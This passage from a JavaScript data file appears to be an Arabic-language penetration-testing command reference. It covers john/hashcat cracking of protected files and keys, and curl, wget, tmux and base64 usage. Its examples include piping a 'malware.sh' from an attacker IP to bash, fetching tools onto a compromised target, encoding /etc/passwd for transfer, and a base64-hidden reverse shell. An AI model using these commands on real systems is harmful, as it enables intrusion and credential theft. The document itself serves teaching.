    { cmd: 'pdf2john document.pdf > pdf.hash && john --wordlist=rockyou.txt pdf.hash', desc: 'كسر PDF مشفر' },
    { cmd: 'ssh2john id_rsa > ssh.hash && john ssh.hash', desc: 'كسر مفتاح SSH المحمي' },
    { cmd: 'office2john document.docx > office.hash && john office.hash', desc: 'كسر وثيقة Office' },
    { cmd: 'keepass2john database.kdbx > kp.hash && john kp.hash', desc: 'كسر KeePass' },
    { cmd: 'rar2john archive.rar > rar.hash && hashcat -m 23700 rar.hash rockyou.txt', desc: 'كسر RAR بـ hashcat' },
    { cmd: 'gpg2john key.gpg > gpg.hash && john gpg.hash --wordlist=rockyou.txt', desc: 'كسر GPG key' },
  ],
  tips: 'استخدم hashcat بعد استخراج الهاش لأنه أسرع على GPU. john يحدد نوع الهاش تلقائياً.',
  related: ['john', 'hashcat', 'zip2john', 'fcrackzip'],
},

// ─── ADDITIONAL IMPORTANT COMMANDS ───────────────────────────────────────────
{
  id: 740, name: 'curl', cat: 'networking', level: 'beginner',
  syntax: 'curl [OPTIONS] URL',
  short: 'نقل البيانات عبر بروتوكولات متعددة',
  desc: `curl أداة لنقل البيانات وإجراء طلبات HTTP/HTTPS/FTP وأكثر. تستطيع: إرسال GET/POST/PUT/DELETE، إضافة Headers، إرسال Cookies، تنزيل ملفات، اختبار APIs. مفيدة جداً في اختبار تطبيقات الويب.`,
  options: [
    { flag: '-X METHOD', desc: 'نوع الطلب: GET, POST, PUT, DELETE' },
    { flag: '-H "Header"', desc: 'إضافة HTTP Header' },
    { flag: '-d "DATA"', desc: 'بيانات POST' },
    { flag: '-b "COOKIE"', desc: 'إرسال Cookies' },
    { flag: '-o FILE', desc: 'حفظ الاستجابة في ملف' },
    { flag: '-O', desc: 'حفظ باسم الملف الأصلي' },
    { flag: '-L', desc: 'تتبع التحويلات (Redirects)' },
    { flag: '-k', desc: 'تجاهل أخطاء SSL' },
    { flag: '-v', desc: 'verbose - عرض كل التفاصيل' },
    { flag: '-I', desc: 'رؤوس HTTP فقط (HEAD request)' },
    { flag: '-u USER:PASS', desc: 'مصادقة Basic Auth' },
  ],
  examples: [
    { cmd: 'curl -I https://target.com', desc: 'فحص headers الخادم' },
    { cmd: 'curl -X POST -d "user=admin&pass=test" http://target.com/login', desc: 'إرسال POST' },
    { cmd: 'curl -H "Authorization: Bearer TOKEN" http://api.target.com/admin', desc: 'API مع رمز مصادقة' },
    { cmd: 'curl -b "PHPSESSID=abc123" http://target.com/admin', desc: 'مع Cookie مصادقة' },
    { cmd: 'curl -s http://192.168.1.100:8080/malware.sh | bash', desc: 'تنزيل وتنفيذ سكريبت' },
    { cmd: 'curl -L -o linpeas.sh https://linpeas.sh', desc: 'تنزيل linpeas' },
    { cmd: 'curl -v -k https://target.com/admin --proxy http://127.0.0.1:8080', desc: 'عبر Burp Suite' },
  ],
  tips: 'curl -v يعرض كل الطلب والاستجابة. --proxy http://127.0.0.1:8080 يمرر عبر Burp Suite. wget بديل لتنزيل الملفات.',
  related: ['wget', 'httpie', 'burpsuite', 'requests'],
},

{
  id: 741, name: 'wget', cat: 'networking', level: 'beginner',
  syntax: 'wget [OPTIONS] URL',
  short: 'تنزيل الملفات وزحف المواقع',
  desc: `wget أداة لتنزيل الملفات من الإنترنت. يدعم HTTP/HTTPS/FTP. يمكنه: تنزيل ملف واحد أو موقع كامل، مواصلة التنزيل المنقطع، تسجيل الدخول بـ Cookies. مفيد لنقل الملفات للأهداف المخترقة.`,
  options: [
    { flag: '-O FILE', desc: 'حفظ باسم مختلف' },
    { flag: '-r', desc: 'تنزيل متكرر (موقع كامل)' },
    { flag: '-c', desc: 'مواصلة تنزيل منقطع' },
    { flag: '-q', desc: 'وضع هادئ' },
    { flag: '-P DIR', desc: 'مجلد الحفظ' },
    { flag: '--no-check-certificate', desc: 'تجاهل أخطاء SSL' },
    { flag: '-U "AGENT"', desc: 'تحديد User-Agent' },
    { flag: '-m', desc: 'نسخ موقع كامل (Mirror)' },
  ],
  examples: [
    { cmd: 'wget http://192.168.1.100:8000/linpeas.sh', desc: 'تنزيل أداة من خادم المهاجم' },
    { cmd: 'wget -r -np -nd http://target.com/', desc: 'تنزيل موقع كامل' },
    { cmd: 'wget --no-check-certificate https://target.com/file.zip', desc: 'تجاهل SSL' },
    { cmd: 'wget -O- http://target.com | grep -i "admin\\|login"', desc: 'تحليل مباشر' },
  ],
  tips: 'python3 -m http.server 8000 على جهاز المهاجم + wget على الهدف = أسرع طريقة لنقل الأدوات للهدف.',
  related: ['curl', 'python-http-server', 'tftp', 'scp'],
},

{
  id: 742, name: 'tmux', cat: 'linux', level: 'beginner',
  syntax: 'tmux [OPTIONS]',
  short: 'مدير الجلسات الطرفية المتعددة',
  desc: `tmux (Terminal Multiplexer) يتيح إدارة جلسات طرفية متعددة في نافذة واحدة. الجلسات تستمر حتى بعد قطع الاتصال (مفيد جداً مع SSH). يمكنك تقسيم الشاشة، التبديل بين الجلسات، ومشاركتها مع آخرين.`,
  options: [
    { flag: 'new-session -s NAME', desc: 'إنشاء جلسة جديدة' },
    { flag: 'attach -t NAME', desc: 'الارتباط بجلسة' },
    { flag: 'list-sessions', desc: 'عرض الجلسات' },
    { flag: 'Ctrl+b c', desc: 'نافذة جديدة' },
    { flag: 'Ctrl+b n/p', desc: 'النافذة التالية/السابقة' },
    { flag: 'Ctrl+b %', desc: 'تقسيم عمودي' },
    { flag: 'Ctrl+b "', desc: 'تقسيم أفقي' },
    { flag: 'Ctrl+b d', desc: 'فصل الجلسة (تظل تعمل)' },
  ],
  examples: [
    { cmd: 'tmux new-session -s pentest', desc: 'جلسة اختبار اختراق جديدة' },
    { cmd: 'tmux attach -t pentest', desc: 'الارتباط بجلسة موجودة' },
    { cmd: 'tmux list-sessions', desc: 'عرض الجلسات الجارية' },
    { cmd: 'tmux new -s recon "nmap -sV target"', desc: 'جلسة مع أمر مباشر' },
  ],
  tips: 'tmux أساسي في pentesting: شغّل nmap في نافذة وburpsuite في أخرى وexploit في ثالثة. جلسة SSH + tmux = لا تفقد عملك عند انقطاع الاتصال.',
  related: ['screen', 'bash', 'ssh'],
},

{
  id: 743, name: 'base64', cat: 'encoding', level: 'beginner',
  syntax: 'base64 [OPTIONS] [FILE]',
  short: 'تشفير وفك تشفير Base64',
  desc: `base64 يشفر ويفك تشفير البيانات بتنسيق Base64. شائع الاستخدام في: تشفير Payloads لتجاوز الفلاتر، ترميز البيانات في HTTP Headers، CTF challenges، حقن أوامر مشفرة.`,
  examples: [
    { cmd: 'echo -n "Hello World" | base64', desc: 'تشفير نص' },
    { cmd: 'echo "SGVsbG8gV29ybGQ=" | base64 -d', desc: 'فك التشفير' },
    { cmd: 'base64 -w 0 file.bin', desc: 'تشفير ملف بدون تقطيع الأسطر' },
    { cmd: 'cat /etc/passwd | base64 -w 0', desc: 'تشفير ملف للنقل' },
    { cmd: 'echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzQ0NDQgMD4mMQ==" | base64 -d | bash', desc: 'تنفيذ Payload مشفر' },
    { cmd: 'python3 -c "import base64; print(base64.b64decode(b\'ENCODED\').decode())"', desc: 'فك تشفير بـ Python' },
  ],
  tips: 'في CTF: أي نص ينتهي بـ == غالباً Base64. Double encoding شائع: base64 | base64. -d للفك.',
  related: ['openssl', 'cyberchef', 'python-scripting', 'xxd'],
},

];
